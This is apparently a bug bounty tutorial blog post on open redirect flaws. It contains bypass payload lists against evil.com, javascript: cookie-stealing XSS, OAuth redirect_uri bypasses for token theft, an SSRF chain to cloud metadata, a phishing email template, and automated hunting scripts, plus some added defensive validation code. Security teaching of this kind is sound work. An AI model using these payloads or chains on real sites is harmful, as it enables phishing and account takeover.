Series: Bug Bounty Zero se Hero 🦸 | Article #22
By HackerMD | 16 min read
Why does it matter? On its own, an Open Redirect pays a $100-$500 bounty, but chained with SSRF, with an OAuth bypass, or inside a phishing chain it becomes Critical! A single parameter can lead to account takeover!
Think of a trusted receptionist at a company:
Normal:
Visitor: "Take me to Conference Room A"
Receptionist: takes them to Conference Room A ✅
Open Redirect:
Attacker: "Take the visitor from here to the evil building" (a forged note)
Receptionist: "Sure!" and blindly follows it! 😱
Problem:
→ The visitor saw the trusted company's name
→ Assumed the redirect was legitimate
→ Actually ended up at the evil site!
On a website:
Legitimate URL:
https://trusted-bank.com/login?next=https://trusted-bank.com/dashboard
Attacker's URL:
https://trusted-bank.com/login?next=https://evil-phishing.com
→ The user sees a trusted-bank.com link
→ Clicks it → redirected to evil-phishing.com!
→ Enters their password! 😱
# ─── COMMON REDIRECT PARAMETERS ──────────
?next=
?url=
?redirect=
?redirect_url=
?redirect_uri=
?return=
?return_url=
?returnUrl=
?returnTo=
?goto=
?dest=
?destination=
?target=
?link=
?to=
?ref=
?location=
?continue=
?forward=
?go=
?r=
?redir=
?out=
?view=
?callback=
?from=
?exit=
# ─── OAUTH/SSO SPECIFIC ──────────────────
?redirect_uri=
?callback_url=
?post_logout_redirect_uri=
?success_url=
?error_url=
?after_login=
?after_logout=
# ─── HTTP HEADERS ─────────────────────────
Referer: header
Location: response header
# First set up your own server:
# Interactsh or a simple Python server:
python3 -m http.server 8888

# Basic payloads:
?next=https://evil.com
?url=https://evil.com
?redirect=https://evil.com
?redirect_uri=https://evil.com
# If the app redirects there → Open Redirect confirmed! ✅
# Protocol variations:
?url=https://evil.com
?url=http://evil.com
?url=//evil.com ← Protocol-relative!
?url=\/\/evil.com
?url=\\evil.com

# JavaScript protocol:
?url=javascript:alert(1) ← XSS also possible!
?url=data:text/html,<script>alert(1)</script>

# Browser URL parsing:
https://trusted.com@evil.com
→ The browser goes to evil.com!
→ The user only sees "trusted.com" in the URL!
?url=https://trusted.com@evil.com
?redirect=https://trusted.com@evil.com

# Weak domain checks:
?url=https://evil.com.target.com
# If the server only checks for the string "target.com"
# → evil.com.target.com passes too!
?url=https://target.com.evil.com
?url=https://evil-target.com
?url=https://evilXtarget.com
?url=https://evil.com#target.com
?url=https://evil.com#.target.com
?url=https://evil.com/.target.com
# target.com after the fragment: filter bypass!

# Whitespace and control characters:
?url=https://evil.com%09
?url=https://evil.com%0a
?url=https://evil.com%0d
?url=https://evil.com%00
?url=%20https://evil.com
?url=%0ahttps://evil.com

# Slash variations:
?url=//evil.com
?url=///evil.com
?url=////evil.com
?url=https:///evil.com
?url=/\evil.com
?url=\/evil.com

# URL encoding:
?url=https%3A%2F%2Fevil.com
?url=https%3A//evil.com
?url=%68%74%74%70%73%3A%2F%2Fevil.com
# Double encoding:
?url=https%253A%252F%252Fevil.com

# IP address forms:
?url=http://1.2.3.4 → IP directly
?url=http://0x1.0x2.0x3.0x4 → Hex IP
?url=http://16909060 → Decimal IP of 1.2.3.4

# Header-based redirect:
GET /logout HTTP/1.1
Host: target.com
Referer: https://evil.com
# Does the app redirect to the Referer after logout?
→ Open Redirect via header!
Step 1: Find an Open Redirect:
https://trusted-bank.com/login?next=https://evil.com
Step 2: Build an evil site that looks like the trusted bank
Step 3: Email the victim:
"Your account is compromised!
Click here to secure: https://trusted-bank.com/login?next=https://evil.com"
Step 4: The victim:
→ sees trusted-bank.com in the URL ✅
→ clicks
→ is redirected to the evil site
→ enters the password → STOLEN! 💀
Impact: High → Critical!
Bounty: $500-$2000
Normal OAuth flow:
1. The user clicks "Login with Google"
2. Google redirects to target.com/callback?code=ABC
3. target.com exchanges the code for an access token

OAuth + Open Redirect attack:
1. Find target.com/oauth/start?redirect_uri=https://evil.com
2. Google treats the redirect_uri as legitimate
(because target.com had registered it)
3. Google redirects to evil.com?code=ABC!
4. evil.com steals the code
5. Google account access! 🔴
This = Critical! Account Takeover!
Bounty: $3000-$10000+
If the server follows redirects server-side:
?url=https://trusted.com/redirect?to=http://169.254.169.254/
Step 1: target.com/fetch?url=https://trusted.com/redirect?to=...
Step 2: The server requests trusted.com
Step 3: trusted.com redirects → 169.254.169.254
Step 4: The server follows it → AWS metadata!
Open Redirect + SSRF = Critical!
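The defender's side of this chain, as an added example that is not code from the article: a server-side fetcher that follows redirects has to re-check every Location hop, not only the URL it was first given. The helper names are hypothetical; they normalise the literal-IP spellings listed above (dotted quad, hex octets, plain decimal) and refuse link-local, loopback and other non-public addresses such as 169.254.169.254. DNS names are assumed to be resolved and checked the same way at connect time, which this offline example does not do.

```python
import ipaddress
import re
from urllib.parse import urlsplit


def literal_ip(host):
    """Map the IP spellings from the article (1.2.3.4, 0x1.0x2.0x3.0x4,
    16909060) to an ip_address; return None for anything that is not a
    literal, i.e. a DNS name."""
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host)             # dotted quad or IPv6
    except ValueError:
        pass
    try:
        if re.fullmatch(r"\d+", host):                # decimal: 16909060
            return ipaddress.ip_address(int(host))
        octets = host.split(".")
        if len(octets) == 4 and all(
            re.fullmatch(r"0x[0-9a-f]+|\d+", o, re.I) for o in octets
        ):                                            # hex octets: 0x1.0x2.0x3.0x4
            return ipaddress.ip_address(".".join(str(int(o, 0)) for o in octets))
    except ValueError:
        pass
    return None


def hop_is_allowed(url):
    """Policy applied to the requested URL and to every Location the fetcher
    is about to follow: http(s) only, and no non-public literal address
    (link-local 169.254.0.0/16, loopback, RFC 1918, multicast, ...)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ip = literal_ip(parts.hostname)
    if ip is None:
        # DNS name: assumption for this example is that resolution happens
        # elsewhere and the resolved address goes through the same check.
        return True
    return ip.is_global and not ip.is_multicast


def first_blocked_hop(chain):
    """Walk a redirect chain (list of URLs, first is the requested URL) and
    return the first hop that must not be fetched, or None if all are fine."""
    for url in chain:
        if not hop_is_allowed(url):
            return url
    return None
```

Checking only the first URL passes the trusted.com hop and misses the metadata address one hop later, which is exactly the chain the steps above describe.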
?next=javascript:alert(document.cookie)
?url=data:text/html,<script>alert(1)</script>
# If the javascript: protocol is allowed:
→ XSS execution!
→ Cookie theft!
→ Account takeover!
The most valuable kind of Open Redirect in bug bounty!
Normal OAuth:
POST /oauth/authorize
redirect_uri=https://target.com/callback

Attack: exact-match bypass:
redirect_uri=https://target.com/callback?next=https://evil.com
# If the server only does a prefix check → Bypass!
redirect_uri=https://target.com.evil.com/callback
redirect_uri=https://target.com/callback/../../../redirect?url=evil.com
Path traversal bypass:
redirect_uri=https://target.com/oauth/../open-redirect?url=evil.com
# If the bypass works:
→ The OAuth token goes to evil.com
→ Account takeover!
→ Critical bounty!
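A defender-side check covering both the ?next= style parameters from the bypass list and the OAuth redirect_uri rules just above, as an added example that is not code from the article. It assumes a hypothetical registered callback https://target.com/callback: a ?next= value is reduced to a same-origin path, so every bypass shape listed earlier (protocol-relative, backslashes, @ userinfo, javascript:, encoded, whitespace) falls back to the default, and redirect_uri is accepted only on an exact string match, which defeats the prefix and path-traversal bypasses.

```python
from urllib.parse import urlsplit, unquote

# Hypothetical registered OAuth callback for this example; not from the article.
REGISTERED_REDIRECT_URIS = {"https://target.com/callback"}


def safe_next_path(value, default="/"):
    """Reduce a ?next=/?url=/?redirect= value to a same-origin path.

    Decode once (the framework normally did that already), then reject:
    control characters and spaces (%09 %0a %0d %00 %20); anything that does
    not start with a single '/' (https://evil.com, javascript:, \\/\\/evil.com,
    https://trusted.com@evil.com, and %252F... which decodes to a literal
    '%2F'); '//host' and '/\\host' protocol-relative forms; and any value
    urlsplit still sees a scheme or netloc in.
    """
    value = unquote(value or "")
    if not value or any(ord(c) < 0x21 for c in value):
        return default
    if value[0] != "/" or value[1:2] in ("/", "\\") or "\\" in value:
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    return value


def is_registered_redirect_uri(candidate):
    """OAuth redirect_uri: exact string match against the registered set.

    No prefix match, no 'contains target.com', no path normalisation: that is
    what rejects /callback?next=..., target.com.evil.com and /callback/../../.
    """
    return candidate in REGISTERED_REDIRECT_URIS
```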
# Find redirect parameters in historical URLs:
gau target.com | grep -iE \
  "next=|url=|redirect=|return=|goto=|dest=|destination=|target=|redir=|redirect_uri=|callback=" \
  > redirect_params.txt
# (the pattern must stay on one line: a newline inside the quotes makes grep
#  treat it as several patterns, one of them empty, which matches every URL)
echo "Redirect params: $(wc -l < redirect_params.txt)"
# Test them:
cat redirect_params.txt | \
  qsreplace "https://evil.com" | \
  httpx -silent \
    -location \
    -mc 301,302,303 | \
  grep -E '\[(https?:)?//evil\.com' > open_redirects.txt
# (match evil.com inside httpx's bracketed Location field; the request URL
#  itself already contains evil.com after qsreplace, so a plain grep matches all)

nuclei -l targets.txt \
  -t ~/nuclei-templates/vulnerabilities/generic/open-redirect.yaml \
  -o redirect_found.txt

nuclei -l targets.txt \
  -tags redirect \
  -o nuclei_redirects.txt
#!/usr/bin/env python3
# open_redirect_test.py
import sys
from urllib.parse import quote

import requests
import urllib3

if len(sys.argv) != 2:
    sys.exit("usage: open_redirect_test.py https://target.com/login")
TARGET_URL = sys.argv[1]
EVIL_DOMAIN = "https://evil-test-12345.com"
EVIL_HOST = EVIL_DOMAIN.replace("https://", "")
# verify=False is kept for scoped test targets; silence the warning it triggers
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PAYLOADS = [
    EVIL_DOMAIN,
    f"//{EVIL_HOST}",
    f"///{EVIL_HOST}",
    f"https://trusted.com@{EVIL_HOST}",
    f"{EVIL_DOMAIN}#.trusted.com",
    "javascript:alert(1)",
    f"%2F%2F{EVIL_HOST}",
    f"https:////{EVIL_HOST}",
]
PARAMS = ["next", "url", "redirect", "return",
          "goto", "dest", "redir", "target",
          "redirect_url", "returnUrl", "continue"]

print(f"🔍 Testing Open Redirect: {TARGET_URL}\n")
for param in PARAMS:
    for payload in PAYLOADS:
        # Encode '#' so the whole payload reaches the server (an unencoded '#'
        # would be dropped as a URL fragment); '%' is left alone so the
        # pre-encoded payloads arrive exactly as written.
        test_url = f"{TARGET_URL}?{param}={quote(payload, safe=':/@%')}"
        try:
            r = requests.get(
                test_url,
                allow_redirects=False,  # inspect the Location header, don't follow it
                timeout=5,
                verify=False,
            )
        except requests.RequestException:
            continue
        location = r.headers.get("Location", "")
        if "evil-test" in location or "javascript" in location.lower():
            print(f"🔴 FOUND! Param: {param}")
            print(f"   Payload: {payload}")
            print(f"   Location: {location}")
            print(f"   URL: {test_url}\n")
#!/bin/bash
# open_redirect_hunt.sh
TARGET=$1
if [ -z "$TARGET" ]; then
  echo "usage: $0 target.com"
  exit 1
fi
DIR="redirect_${TARGET}"
mkdir -p "$DIR"
echo "🔀 Open Redirect Hunt: $TARGET"
echo "════════════════════════════════"
# Step 1: redirect params from historical URLs (pattern kept on one line:
# a newline inside the quotes would give grep an empty pattern matching everything)
echo "📡 Finding redirect parameters..."
gau "$TARGET" | grep -iE \
  "next=|url=|redirect=|return=|goto=|dest=|redir=|redirect_uri=|callback=" | \
  uro > "$DIR/redirect_urls.txt"
echo "✅ URLs: $(wc -l < "$DIR/redirect_urls.txt")"
# Step 2: Live check
cat "$DIR/redirect_urls.txt" | \
  httpx -silent -mc 200,301,302 \
  > "$DIR/live_redirects.txt"
# Step 3: Payload inject + test
# (-follow-redirects dropped: following the redirect returns the final 200 and
#  never matches 301/302; the grep matches evil.com in httpx's bracketed
#  Location field, not in the request URL that qsreplace already filled in)
echo "💉 Testing payloads..."
cat "$DIR/live_redirects.txt" | \
  qsreplace "https://evil.com" | \
  httpx -silent \
    -location \
    -mc 301,302 | \
  grep -E '\[(https?:)?//evil\.com' > "$DIR/open_redirects.txt"
# Step 4: Nuclei scan
nuclei -l "$DIR/live_redirects.txt" \
  -tags redirect,open-redirect \
  -silent \
  -o "$DIR/nuclei_redirect.txt" 2>/dev/null
touch "$DIR/nuclei_redirect.txt"   # so the summary below works with zero findings
# Step 5: OAuth redirect_uri check
echo "🔑 OAuth redirect_uri check..."
gau "$TARGET" | grep -iE \
  "redirect_uri=|callback_url=" | \
  uro > "$DIR/oauth_redirects.txt"
echo "════════════════════════════════"
echo "📊 Results:"
echo "Redirect URLs   : $(wc -l < "$DIR/redirect_urls.txt")"
echo "Open Redirects  : $(wc -l < "$DIR/open_redirects.txt")"
echo "OAuth URIs      : $(wc -l < "$DIR/oauth_redirects.txt")"
echo "Nuclei Findings : $(wc -l < "$DIR/nuclei_redirect.txt")"
echo "Results in      : $DIR/"
# ─── BASIC PAYLOADS ───────────────────────
?next=https://evil.com
?url=//evil.com
?redirect=\/\/evil.com
# ─── BYPASS ───────────────────────────────
@evil.com → https://trusted.com@evil.com
#target.com → https://evil.com#target.com
%09evil.com → Tab character
%0aevil.com → Newline
///evil.com → Triple slash
javascript:alert(1) → XSS via redirect
# ─── OAUTH BYPASS ─────────────────────────
redirect_uri=https://target.com/callback?url=evil.com
redirect_uri=https://target.com.evil.com
redirect_uri=https://target.com/../redirect?to=evil.com
# ─── CHAINS ───────────────────────────────
Open Redirect + Phishing → Social engineering
Open Redirect + OAuth → Account Takeover!
Open Redirect + SSRF → Internal access!
Open Redirect + XSS → Cookie steal!
# ─── TOOLS ────────────────────────────────
gau + grep + qsreplace + httpx → Automated
nuclei -tags redirect → Templates
Manual Burp testing → Bypass test
🟢 Low ($100-200):
→ Basic redirect to external site
→ No authentication context
→ Non-sensitive application
🟡 Medium ($200-500):
→ Authenticated redirect
→ Login flow redirect
→ Phishing potential
🟠 High ($500-2000):
→ OAuth redirect_uri bypass
→ Authentication token exposure
→ SSRF chain potential
🔴 Critical ($2000-10000+):
→ OAuth token steal → Account takeover
→ SSRF chain → Internal access
→ Admin panel redirect
# 1. Find redirect params in Wayback URLs:
gau hackerone.com | grep -iE "next=|url=|redirect=" | head -20
# 2. Install qsreplace:
go install github.com/tomnomnom/qsreplace@latest
# 3. Practice:
echo "https://example.com/login?next=https://example.com" | \
  qsreplace "https://evil.com"
# 4. Test manually in Burp Suite:
# Find a login page → next= parameter
# Replace it with evil.com → check for the redirect
# 5. Find OAuth apps:
# Apps with "Login with Google/Facebook"
# Test the redirect_uri parameter
🔀 Open Redirect = Unvalidated URL redirect
📍 Find = next=, url=, redirect=,
return=, goto=, dest=
🛡️ Bypass = @ trick, //, fragment,
encoding, whitespace
⛓️ Chains = + Phishing → Social eng
+ OAuth → Account takeover!
+ SSRF → Internal access!
+ XSS → Cookie steal!
🤖 Tools = gau + qsreplace + httpx
nuclei -tags redirect
💰 Alone = Low-Medium ($100-500)
💰 With chain = Critical ($2000-10000+)!

On a SaaS app I saw:
https://target.com/auth/logout?redirect=https://target.com/home
I tested:
https://target.com/auth/logout?redirect=https://evil.com
It redirected to evil.com! Open Redirect confirmed.
I built a phishing PoC, but the bounty was only $200.
Then I thought: this app has OAuth too!
https://target.com/oauth/google/callback?redirect_uri=https://target.com/auth/logout?redirect=https://evil.com
Google OAuth token → target.com → logout → evil.com!
The token was in the URL, so the Google OAuth code landed on evil.com!
Account Takeover chain complete!
Bounty: $3,500 Critical! 🎉
Lesson: an Open Redirect alone is weak, but build a chain and its value goes up 10x!
In the next article: Authentication Bypass. Bypass the login page, become admin, exploit tokens! 🔥
HackerMD Bug Bounty Hunter | Cybersecurity Researcher
GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #21 Backup Files Exposure
Next: Article #23 Authentication Bypass: From Login Bypass to Admin!
#OpenRedirect #BugBounty #WebSecurity #EthicalHacking #Hinglish #OAuthBypass #HackerMD